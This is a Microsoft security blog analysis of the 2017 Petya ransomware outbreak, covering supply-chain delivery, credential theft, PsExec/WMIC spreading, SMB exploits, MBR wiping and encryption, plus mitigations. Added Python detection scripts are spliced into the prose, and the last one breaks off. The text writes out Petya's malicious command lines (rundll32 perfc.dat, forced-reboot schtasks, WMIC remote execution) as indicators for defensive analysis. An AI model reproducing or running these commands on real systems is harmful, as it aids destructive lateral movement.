[Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) uses virtualization-based security to protect derived domain credentials and stop attempts to compromise privileged accounts.\n\n### Network scanning\n\nArmed with exploits or stolen credentials, ransomware can spread across networks through network scanning. For example, Petya scanned affected networks to establish valid connections to other computers. It then attempted to transfer copies of the malware using stolen credentials. Petya also scanned for network shares in an attempt to spread through those shares.\n\nWannaCrypt, on the other hand, ran massive scanning of IP addresses to look for computers that are vulnerable to the EternalBlue exploit. This gave it the ability to spread to out-of-date computers outside the network. Network defenders can uncover and stop unauthorized network scanning behaviors.\n\n### Destructive behavior\n\nIn most ransomware cases, the attacker motivation is clear: victims need to pay the ransom or never gain back access to encrypted files. While there is no guarantee that files are decrypted after payment is made, most ransomware infections make their intention clear through a ransom note. In August, WannaCrypt actors wrapped up their campaign by [withdrawing ransom paid in Bitcoins from online wallets](<http://www.bbc.com/news/technology-40811972>).\n\nPetya behaved like other ransomware in this aspect. Attackers [emptied the Petya online wallets](<https://www.theguardian.com/technology/2017/jul/05/notpetya-ransomware-hackers-ukraine-bitcoin-ransom-wallet-motives>) earlier in July. However, Petya had far more destructive routines: it overwrote or damaged the Master Boot Record (MBR) and Volume Boot Record (VBR), rendering affected computers unusable. 
This started a conversation about whether this Petya variant was primarily a ransomware like WannaCrypt or a destructive cyberattack like [Depriz](<https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/>) (also known as Shamoon).\n\n\n\n_Figure 4. Petya incorporated complex behaviors not typical of ransomware_\n\nThe debate is not settled, but the Petya attack does raise an important point\u2014attackers can easily incorporate other payloads into ransomware code to facilitate [targeted attacks](<https://krebsonsecurity.com/2016/09/ransomware-getting-more-targeted-expensive/>) and other types of destructive cyberattacks. As the threat of ransomware escalates, enterprises and individuals alike need a sound cybersecurity strategy and a protection suite that will defend against the end-to-end ransomware infection process.\n\n## Integrated end-to-end security suite against ransomware\n\nWith high-profile global outbreaks and other notable trends, the first six months of 2017 can be considered one of the more turbulent periods in the history of ransomware. The observations we summarized in this blog highlight the potency of the ransomware threat. Unfortunately, given the trends, we may see similarly sophisticated or even more complex attacks in the foreseeable future. More importantly, however, we should learn from these attacks and developments, because they highlight the areas of cybersecurity that need to be improved and reevaluated.\n\nAt Microsoft, we\u2019re always hard at work to continuously harden Windows 10 against ransomware and other attacks. In the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>), we will integrate Microsoft security solutions into a powerful single pane of glass\u2014centralized management that will allow customers to consume, manage, and integrate security for devices in the network. 
Windows Defender ATP will be expanded to include seamless integration across the entire Windows protection stack. The suite of tools will include the new Windows Defender Exploit Guard and Windows Defender Application Guard, as well as the enhanced Windows Defender Device Guard and Windows Defender AV.\n\nToday, Windows 10 Creators Update has [next-gen technologies that protect against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\n_Figure 5. Windows 10 end-to-end protection stack (source: _[_Next-gen ransomware protection with Windows 10 Creators Update_](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)_)_\n\nWindows 10 has [multiple exploit mitigations](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>), including Control Flow Guard for the kernel (kCFG), kernel mode code integrity (KMCI), improved kernel address space layout randomization (KASLR), and non-executable kernel regions (NX HAL and NX page pool). These mitigations help make [Windows 10 resilient](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>) to exploit attacks, such as those used by WannaCrypt and Petya.\n\n### Intelligent Security Graph and machine learning\n\nSecurity built into Windows 10 is powered by the Microsoft [Intelligent Security Graph](<https://t.co/UpWPG34Kwy>), which correlates signals from billions of sensors. 
Unique insights from this vast security intelligence enable Microsoft to deliver real-time protection through [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>), [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>), and other next-gen security technologies.\n\nThe increasing magnitude and complexity of ransomware require advanced real-time protection. [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>) uses precise [machine learning models](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>) as well as generic and heuristic techniques, improved detection of script-based ransomware, and enhanced behavior analysis to detect common and complex ransomware code. Using the cloud protection service, Windows Defender AV provides real-time protection. In recent enhancements, the [cloud protection service can make a swift assessment](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) of new and unknown files, allowing Windows Defender AV to block new malware the first time it is seen.\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) empowers SecOps personnel to [stop ransomware outbreaks](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) in the network. Both WannaCrypt and Petya showed how critical it is to detect, investigate, and respond to ransomware attacks and prevent the spread. Windows Defender ATP\u2019s enhanced behavioral and [machine learning detection libraries](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) flag malicious behavior across the ransomware infection process. 
The new process tree visualization and improvements in machine isolation further help security operations to investigate and respond to ransomware attacks.\n\n### Online safety with Microsoft Edge and Office 365 Advanced Threat Protection\n\n[Microsoft Edge](<https://docs.microsoft.com/en-us/microsoft-edge/deploy/index>) can help block ransomware infections from the web by opening pages within app container boxes. It uses reputation-based blocking of downloads. Its click-to-run feature for Flash can stop ransomware infections that begin with exploit kits.\n\nTo defend against ransomware attacks that begin with email, [Microsoft Exchange Online Protection (EOP)](<https://products.office.com/en-us/exchange/exchange-email-security-spam-protection>) uses built-in anti-spam filtering capabilities that help protect Office 365 customers. [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection>) helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. Outlook.com anti-spam filters also provide protection against malicious emails.\n\n### Virtualization-based security and application control\n\n[Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) can protect domain credentials from attacks like Petya, which attempted to steal credentials for use in lateral movement. Credential Guard uses virtualization-based security to protect against credential dumping.\n\nEnterprises can implement virtualization-based lockdown security, which can block all types of unauthorized content. 
[Windows Defender Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies>) combines virtualization-based security and application control to allow only authorized apps to run. Petya, whose first infections were traced back to a compromised software update process, was blocked on devices with Device Guard enabled.\n\n### Microsoft-vetted security with Windows 10 S and more security features in Windows 10 Fall Creators Update\n\nDevices can achieve a similar lockdown security with [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>), which streamlines security and performance by working exclusively with apps from the Windows Store, ensuring that only apps that went through the Store onboarding, vetting, and signing process are allowed to run.\n\nAll of these security features make Windows 10 our most secure platform. Next-gen security technologies in Windows 10 provide next-gen protection against ransomware.\n\n\n\n_Figure 6. Windows 10 next-gen security _\n\nBut the work to further harden Windows 10 against ransomware and other threats continues. Expect more security features and capabilities in the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>).\n\n \n\n**_Tanmay Ganacharya (_**[**@tanmayg**](<https://twitter.com/tanmayg>)**_)_**\n\n_Principal Group Manager, Windows Defender Research_\n\n#### \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? 
Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>).\n\nFollow us on Twitter [@MMPC](<https://twitter.com/msftmmpc>) and Facebook [Microsoft Malware Protection Center](<https://www.facebook.com/msftmmpc/>)\n\n* * *\n\n_Source: \"Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene\", Microsoft Malware Protection Center blog, published 2017-09-06, <https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>. Related CVEs: CVE-2017-0144, CVE-2017-0145 (CVSS v3.0 base score 8.1, vector CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H; CVSS v2 base score 9.3, vector AV:N/AC:M/Au:N/C:C/I:C/A:C). Corpus record MMPC:F3E0CD42C341A30C758CB85AD9F6D052._\n\n* * *\n\n_(Note: We have published a follow-up blog entry on this ransomware attack. 
We have new findings from our continued investigation, as well as platform mitigation and protection information: [Windows 10 platform resilience against the Petya ransomware attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>). Read our latest comprehensive report on ransomware: [**Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>).)_\n\n \n\nOn June 27, 2017, reports of a [ransomware](<https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>) infection began spreading across Europe. We saw the first infections in Ukraine, where more than 12,500 machines encountered the threat. We then observed infections in another 64 countries, including Belgium, Brazil, Germany, Russia, and the United States.\n\nThe new ransomware has worm capabilities, which allow it to move laterally across infected networks. Based on our investigation, this new ransomware shares code with, and is a new variant of, [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Petya>). This new strain, however, is more sophisticated.\n\nTo protect our customers, we released cloud-delivered protection updates and updated our signature definition packages shortly after. These updates were automatically delivered to all Microsoft free antimalware products, including [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) and Microsoft Security Essentials. 
You can download the latest version of these files manually at the [Malware Protection Center](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) automatically detects behaviors used by this new ransomware variant without any updates.\n\n## Delivery and installation\n\nInitial infection appears to involve a software supply-chain compromise of the Ukrainian company M.E.Doc, which develops the tax accounting software MEDoc. Although this vector was speculated about at length by news media and security researchers, including Ukraine\u2019s own Cyber Police, there was only circumstantial evidence for it. Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process. As we highlighted previously, [software supply chain attacks](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) are a recent and dangerous trend among attackers, and they require advanced defenses.\n\nWe observed telemetry showing the MEDoc software updater process (_EzVit.exe_) executing a malicious command line matching this exact attack pattern on Tuesday, June 27 around 10:30 a.m. 
GMT.\n\nThe execution chain leading to the ransomware installation (represented in a diagram in the original post) confirms that the _EzVit.exe_ process from MEDoc, for unknown reasons, at some moment executed the following command line:\n\n_\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\ProgramData\\perfc.dat\",#1 30_\n\nThe same update vector was also mentioned by the Ukraine Cyber Police in a public list of indicators of compromise (IOCs), which includes the MEDoc updater.\n\n## A single ransomware, multiple lateral movement techniques\n\nGiven this new ransomware's added lateral movement capabilities, it only takes a single infected machine to affect a network. The ransomware's spreading functionality is composed of multiple methods responsible for:\n\n * stealing credentials or re-using existing active sessions\n * using file shares to transfer the malicious file across machines on the same network\n * using existing legitimate functionality to execute the payload, or abusing SMB vulnerabilities on unpatched machines\n\nIn the next sections, we discuss the details of each technique.\n\n## Lateral movement using credential theft and impersonation\n\nThis ransomware drops a credential dumping tool (typically as a .tmp file in the _%Temp%_ folder) that shares code similarities with [Mimikatz](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=HackTool:Win32/Mimikatz>) and comes in 32-bit and 64-bit variants. Because users frequently log in using accounts with local admin privileges and have active sessions open across multiple machines, stolen credentials are likely to provide the same level of access the user has on other machines.\n\nOnce the ransomware has valid credentials, it scans the local network to establish valid connections on ports _tcp/139_ and _tcp/445_. 
A special behavior is reserved for domain controllers and servers: the ransomware attempts to call _DhcpEnumSubnets()_ to enumerate DHCP subnets and, for each subnet, gathers all hosts/clients (using _DhcpEnumSubnetClients()_) and scans them for _tcp/139_ and _tcp/445_ services. If it gets a response, the malware attempts to copy a binary to the remote machine using regular file-transfer functionality with the stolen credentials.\n\nIt then tries to execute the malware remotely using either the PSEXEC or WMIC tool.\n\nThe ransomware attempts to drop the legitimate _psexec.exe_ (typically renamed to _dllhost.dat_) from an embedded resource within the malware. It then scans the local network for _admin$_ shares, copies itself across the network, and executes the newly copied malware binary remotely using PSEXEC.\n\nIn addition to credential dumping, the malware also tries to steal credentials by using the _CredEnumerateW_ function to get all the other user credentials potentially stored in the credential store. If a credential name starts with _\"TERMSRV/\"_ and its type is 1 (generic), it uses that credential to propagate through the network.\n\n_Ransomware code responsible for accessing \\\\Admin$ shares on different machines_\n\nThis ransomware also uses the Windows Management Instrumentation Command-line (WMIC) to find remote shares (using _NetEnum/NetAdd_) to spread to. 
It uses either a duplicate token of the current user (for existing connections), or a username/password combination (spreading through legitimate tools).\n\n_Screenshot showing launch of malware on a remote machine using WMIC_\n\n## Lateral movement using EternalBlue and EternalRomance\n\nThe new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability [CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) (also known as EternalBlue), which was fixed in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) and was also exploited by [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (also known as EternalRomance, and fixed by the same bulletin).\n\nWe\u2019ve seen this ransomware attempt to use these exploits by generating SMBv1 packets (which are all XOR-encoded with the byte _0xCC_) to trigger these vulnerabilities; the original post shows the address in the malware code where this happens.\n\nThese two exploits were leaked by a group called [Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>). However, it is important to note that both of these vulnerabilities were fixed by Microsoft in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) on March 14, 2017.\n\nMachines that are patched against these exploits (with [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) or [have disabled SMBv1](<https://support.microsoft.com/kb/2696547>) are not affected by this particular spreading mechanism. 
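The post notes that the ransomware keeps its EternalBlue/EternalRomance SMBv1 packets XOR-encoded with 0xCC. The scanner below is an added example, not code from the Microsoft post or from the malware: it searches a byte buffer for the encoded form of the SMB header magic, validates the NetBIOS session header that precedes it, and decodes the SMBv1 header so an analyst can tell which SMB commands an unpacked sample carries. The sample buffer is constructed for this example, and the command-code table comes from the SMB protocol documentation rather than from the post.

```python
"""Find and decode XOR-0xCC-obfuscated SMBv1 packets in a byte buffer.

Added example, not code from the Microsoft post or from the malware. SAMPLE_BLOB
is constructed for this example: well-formed SMBv1 request headers wrapped the
way the post describes, not real exploit packets.
"""
from __future__ import annotations

from dataclasses import dataclass

XOR_KEY = 0xCC
SMB_MAGIC = b"\xffSMB"
ENCODED_MAGIC = bytes(b ^ XOR_KEY for b in SMB_MAGIC)  # what the magic looks like once encoded

# SMBv1 command codes from the SMB protocol documentation (not from the post).
SMB_COMMANDS = {
    0x25: "SMB_COM_TRANSACTION",
    0x32: "SMB_COM_TRANSACTION2",
    0x72: "SMB_COM_NEGOTIATE",
    0x73: "SMB_COM_SESSION_SETUP_ANDX",
    0x75: "SMB_COM_TREE_CONNECT_ANDX",
    0xA0: "SMB_COM_NT_TRANSACT",
}


def xor_cc(data: bytes) -> bytes:
    """Apply the single-byte XOR the post describes; it is its own inverse."""
    return bytes(b ^ XOR_KEY for b in data)


@dataclass
class SmbPacket:
    offset: int        # where the NetBIOS session header starts in the buffer
    length: int        # NetBIOS payload length (SMB header + body)
    command: int
    command_name: str
    status: int
    flags2: int


def find_encoded_smb_packets(blob: bytes) -> list[SmbPacket]:
    """Locate encoded SMBv1 packets that sit behind a NetBIOS session header."""
    found: list[SmbPacket] = []
    pos = blob.find(ENCODED_MAGIC)
    while pos != -1:
        start = pos - 4  # the 4-byte NetBIOS session header precedes the SMB header
        if start >= 0:
            nb = xor_cc(blob[start:pos])
            # NetBIOS session message: type 0x00, then a 24-bit big-endian length.
            if nb[0] == 0x00:
                length = int.from_bytes(nb[1:4], "big")
                hdr = xor_cc(blob[pos:pos + 32])
                # Require a full 32-byte SMB header and a length that fits in the buffer.
                if len(hdr) == 32 and 32 <= length <= len(blob) - pos:
                    cmd = hdr[4]
                    found.append(SmbPacket(
                        offset=start,
                        length=length,
                        command=cmd,
                        command_name=SMB_COMMANDS.get(cmd, f"0x{cmd:02x}"),
                        status=int.from_bytes(hdr[5:9], "little"),
                        flags2=int.from_bytes(hdr[10:12], "little"),
                    ))
        pos = blob.find(ENCODED_MAGIC, pos + 1)
    return found


def build_smb_request(command: int, body: bytes, flags2: int = 0xC853) -> bytes:
    """Plaintext SMBv1 request: NetBIOS session header + 32-byte SMB header + body."""
    hdr = bytearray(32)
    hdr[0:4] = SMB_MAGIC
    hdr[4] = command
    hdr[9] = 0x18                                  # Flags: canonical paths, case-insensitive
    hdr[10:12] = flags2.to_bytes(2, "little")
    hdr[26:28] = (0xFEFF).to_bytes(2, "little")    # PID field
    payload = bytes(hdr) + body
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


# Constructed sample: junk, an encoded Negotiate request, junk, an encoded Trans2
# request, then a decoy (the encoded magic with no NetBIOS header in front of it).
SAMPLE_BLOB = (
    b"\x90" * 7
    + xor_cc(build_smb_request(0x72, b"\x00\x0c\x00\x02NT LM 0.12\x00"))
    + b"\x41" * 5
    + xor_cc(build_smb_request(0x32, b"\x0f" + b"\x00" * 32))
    + b"\x11\x22\x33\x44" + ENCODED_MAGIC + b"\x00" * 40
)

if __name__ == "__main__":
    for pkt in find_encoded_smb_packets(SAMPLE_BLOB):
        print(f"offset={pkt.offset:4d} len={pkt.length:3d} "
              f"cmd={pkt.command_name} flags2=0x{pkt.flags2:04x}")
```

Searching for the encoded magic rather than decoding the whole buffer first keeps false positives down; the NetBIOS type byte and the length check reject stray hits, as the decoy at the end of the sample shows.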
Please refer to our previous [blog](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) for details on these exploits and how modern Windows 10 mitigations can help to contain similar threats.\n\n## Encryption\n\nThis ransomware\u2019s encryption behavior depends on the privilege level of the malware process and on the processes found running on the machine. It applies a simple XOR-based hashing algorithm to process names and checks the results against the following hash values, which it uses as behavior exclusions:\n\n * _0x6403527E_ or _0x651B3005_: if a process whose name hashes to either value is running on the machine, the ransomware does not attempt SMB exploitation.\n * _0x2E214B44_: if a process whose name hashes to this value is running, the ransomware destroys the first 10 sectors of _\\\\.\\PhysicalDrive0_, including the MBR.\n\nThe ransomware then writes to the master boot record (MBR) and sets up the system to reboot. It creates a scheduled task to shut down the machine at least 10 minutes after the current time; the exact delay is random, derived from _GetTickCount()_. 
For example:\n\n_schtasks /Create /SC once /TN \"\" /TR \"<system folder>\\shutdown.exe /r /f\" /ST 14:23_\n\nThe MBR code is overwritten only if the malware is running with the highest privilege (i.e., with _SeDebugPrivilege_ enabled). After successfully modifying the MBR, it displays a fake system message (shown in the original post) that reports a supposed error on the drive and shows a fake integrity check, and then displays the ransom note.\n\nThis ransomware attempts to encrypt all files with the following file name extensions in all folders on all fixed drives, except for _C:\\Windows_:\n\n.3ds | .7z | .accdb | .ai \n---|---|---|--- \n.asp | .aspx | .avhd | .back \n.bak | .c | .cfg | .conf \n.cpp | .cs | .ctl | .dbf \n.disk | .djvu | .doc | .docx \n.dwg | .eml | .fdb | .gz \n.h | .hdd | .kdbx | .mail \n.mdb | .msg | .nrg | .ora \n.ost | .ova | .ovf | .pdf \n.php | .pmf | .ppt | .pptx \n.pst | .pvi | .py | .pyc \n.rar | .rtf | .sln | .sql \n.tar | .vbox | .vbs | .vcb \n.vdi | .vfd | .vmc | .vmdk \n.vmsd | .vmx | .vsdx | .vsv \n.work | .xls | .xlsx | .xvd \n.zip | | | \n \nIt uses file mapping APIs instead of the usual _ReadFile()_/_WriteFile()_ APIs.\n\nUnlike most other ransomware, this threat does not append a new file name extension to encrypted files. 
Instead, it overwrites the files in place.\n\nThe AES key generated for encryption is unique per machine and per fixed drive, and it is exported and encrypted using the attacker's embedded 2048-bit RSA public key.\n\n_Embedded RSA public key_\n\n_Code exporting the AES-128 key per machine, per fixed drive in the machine and encrypting it using the embedded RSA public key during export_\n\nThe AES key used for file encryption is added, in encrypted form, to the _README.TXT_ file the threat writes, under the section _\"Your personal installation key:\"_.\n\nBeyond encrypting files, this ransomware also attempts to infect the MBR or destroy certain sectors of the VBR and MBR.\n\nAfter completing its encryption routine, this ransomware drops a text file called _README.TXT_ in each fixed drive (its text is shown in the original post).\n\nThis ransomware also clears the System, Setup, Security, and Application event logs and deletes NTFS journal information.\n\n## Detection and investigation with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) is a post-breach solution and offers by-design detections for this attack without the need for any signature updates. Windows Defender ATP sensors constantly monitor and collect telemetry from endpoints and offer machine-learning detections for common lateral movement techniques and tools used by this ransomware, including, for example, the execution of _PsExec.exe_ under a different filename, and the creation of the _perfc.dat_ file on remote shares (UNC paths).\n\nToday, without the need for additional updates, an infected machine raises the alerts shown in the original post.\n\nThe second alert targets the distribution of the ransomware\u2019s .dll file over the network. This event provides helpful information during investigation, as it includes the user context that was used to move the file remotely. 
This user account has been compromised and may be the account associated with patient zero.\n\nWith Windows Defender ATP, enterprise customers are well-equipped to quickly identify Petya outbreaks, investigate the scope of the attack, and respond early to malware delivery campaigns.\n\n## Protection against this new ransomware attack\n\nKeeping your [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>) [up-to-date](<https://support.microsoft.com/en-us/help/311047/how-to-keep-your-windows-computer-up-to-date>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows. In Creators Update, we further [hardened Windows 10 against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>) by introducing new next-gen technologies and enhancing existing ones.\n\nAs another layer of protection, [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) only allows apps that come from the Windows Store to run. Windows 10 S users are further protected from this threat.\n\nWe recommend that customers who have not yet installed security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\nAs the threat targets ports 139 and 445, customers can block any traffic on those ports to prevent propagation either into or out of machines in the network. You can also disable remote WMI and file sharing. 
These measures can significantly disrupt your network, but they may be appropriate for a short period while you assess the impact and [apply definition updates](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\nAside from exploiting vulnerabilities, this threat can also spread across networks by stealing credentials, which it then uses to copy itself to remote machines and execute the copy there. You can limit credential theft and its impact by enforcing credential hygiene across the organization. [Secure privileged access](<https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access>) to prevent the spread of threats like Petya and to protect your organization\u2019s assets. Use [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) to protect domain credentials stored in the Windows Credential Store.\n\nWindows Defender Antivirus detects this threat as [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/entry.aspx?Name=Ransom:Win32/Petya>) as of the [1.247.197.0 update](<https://www.microsoft.com/security/portal/definitions/adl.aspx>). Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run and effectively preventing malware from running.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. 
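Windows Defender ATP is one way to surface this activity. As an added example that is not from the Microsoft post, the script below applies the command-line and NetFlow indicators listed in this post's Indicators of Compromise section to exported logs: it matches the schtasks-driven reboot (and checks that the /ST time falls in the 10 to 60 minute window the post describes), rundll32 loading perfc.dat, WMIC remote process creation, and a PsExec-style invocation of the renamed dllhost.dat, and it flags hosts that sweep tcp/139 and tcp/445 either across their own /24 or across several /24s. The log records and flow tuples are constructed for this example; the field names (time, host, cmdline), the thresholds, the wmic /node usage and the exact dllhost.dat command line are assumptions, not indicators quoted in the post.

```python
"""Hunt for the Petya command-line and NetFlow indicators from the post's IOC section.

Added example, not code from the Microsoft post. Log records, flow tuples, field
names, thresholds and the dllhost.dat invocation form are constructed/assumed.
"""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network

# Command-line rules derived from the post's IOC section (matched case-insensitively).
COMMAND_LINE_RULES = [
    # schtasks /Create /SC once /TN "" /TR "<system folder>\shutdown.exe /r /f" /ST <time>
    ("petya_reboot_task", re.compile(
        r'schtasks\s+(?:/RU\s+"SYSTEM"\s+)?/Create\s+/SC\s+once\s+/TN\s+""\s+'
        r'/TR\s+"[^"]*shutdown\.exe\s+/r\s+/f"\s+/ST\s+(?P<st>\d{1,2}:\d{2})', re.I)),
    # rundll32.exe "...\perfc.dat",#1  (also fires on the WMIC and PsExec variants)
    ("petya_rundll32_perfc", re.compile(r'rundll32\.exe.*?perfc\.dat\\?"?\s*,?\s*#1', re.I)),
    # wmic ... process call create "rundll32.exe \"...\perfc.dat\" #1"
    ("petya_wmic_remote_exec", re.compile(r'process\s+call\s+create\s+.*rundll32\.exe.*perfc\.dat', re.I)),
    # PsExec dropped as dllhost.dat and pointed at a UNC target (assumed invocation form)
    ("petya_psexec_as_dllhost", re.compile(r'dllhost\.dat\s+\\\\\S+', re.I)),
]
SMB_PORTS = {139, 445}


def minutes_until(event_time: datetime, st: str) -> int:
    """Minutes from the event timestamp to the /ST wall-clock time (wrapping past midnight)."""
    hh, mm = (int(x) for x in st.split(":"))
    target = event_time.replace(hour=hh, minute=mm, second=0, microsecond=0)
    delta = (target - event_time).total_seconds() / 60
    if delta < 0:
        delta += 24 * 60
    return round(delta)


def scan_command_lines(events: list[dict]) -> list[dict]:
    """events: dicts with 'time' (datetime), 'host', 'cmdline'. One hit per matching rule."""
    hits = []
    for ev in events:
        for name, rx in COMMAND_LINE_RULES:
            m = rx.search(ev["cmdline"])
            if not m:
                continue
            hit = {"host": ev["host"], "time": ev["time"], "rule": name}
            if name == "petya_reboot_task":
                delay = minutes_until(ev["time"], m.group("st"))
                hit["minutes_until_reboot"] = delay
                hit["in_petya_window"] = 10 <= delay <= 60   # the post: 10 to 60 minutes out
            hits.append(hit)
    return hits


def detect_smb_scanning(flows, workstation_min_targets: int = 10, server_min_subnets: int = 3) -> dict:
    """flows: iterable of (src_ip, dst_ip, dst_port). Returns {src_ip: description} for sweepers."""
    targets = defaultdict(set)
    for src, dst, dport in flows:
        if dport in SMB_PORTS:
            targets[src].add(ip_address(dst))
    findings = {}
    for src, dsts in targets.items():
        own_net = ip_network(f"{src}/24", strict=False)
        local = [d for d in dsts if d in own_net]
        subnets = {ip_network(f"{d}/24", strict=False) for d in dsts}
        if len(subnets) >= server_min_subnets:
            findings[src] = f"sweeps tcp/139,445 across {len(subnets)} /24 subnets (server/DC pattern)"
        elif len(local) >= workstation_min_targets:
            findings[src] = f"sweeps tcp/139,445 on {len(local)} hosts in its own /24 (workstation pattern)"
    return findings


# Constructed process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"time": datetime(2017, 6, 27, 14, 1), "host": "WS-0412",
     "cmdline": r'cmd.exe /c schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 14:23'},
    {"time": datetime(2017, 6, 27, 14, 0), "host": "WS-0412",
     "cmdline": r'"C:\Windows\system32\rundll32.exe" "C:\ProgramData\perfc.dat",#1 30'},
    {"time": datetime(2017, 6, 27, 14, 2), "host": "WS-0412",
     "cmdline": r'wmic /node:10.1.1.33 process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1"'},
    {"time": datetime(2017, 6, 27, 14, 3), "host": "WS-0412",
     "cmdline": r'C:\Windows\dllhost.dat \\10.1.1.40 -accepteula -s -d C:\Windows\System32\rundll32.exe C:\Windows\perfc.dat,#1 30'},
    {"time": datetime(2017, 6, 27, 9, 0), "host": "WS-0099",
     "cmdline": r'schtasks /Create /SC daily /TN "Backup" /TR "C:\Tools\backup.exe" /ST 02:00'},
    {"time": datetime(2017, 6, 27, 9, 5), "host": "WS-0099",
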